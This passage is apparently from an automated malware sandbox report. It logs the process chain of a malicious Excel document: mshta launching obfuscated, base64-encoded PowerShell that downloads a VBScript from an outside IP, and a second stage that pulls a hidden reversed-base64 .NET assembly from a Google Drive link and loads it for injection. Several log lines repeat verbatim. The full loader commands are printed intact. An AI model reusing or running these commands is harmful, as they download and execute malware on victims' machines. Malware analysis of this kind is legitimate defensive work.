JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES955D.tmp" "c:\Users\user\AppData\Local\Temp\td4qmpaq\CSC7C3FCBBFF452466CBE70AA6FD2E366A.TMP"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mans504x\mans504x.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD71D.tmp" "c:\Users\user\AppData\Local\Temp\mans504x\CSCCEA378A2A3F7449F819B5EAA6DFD95A.TMP"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNtJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES955D.tmp" "c:\Users\user\AppData\Local\Temp\td4qmpaq\CSC7C3FCBBFF452466CBE70AA6FD2E366A.TMP"Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"Jump to behavior
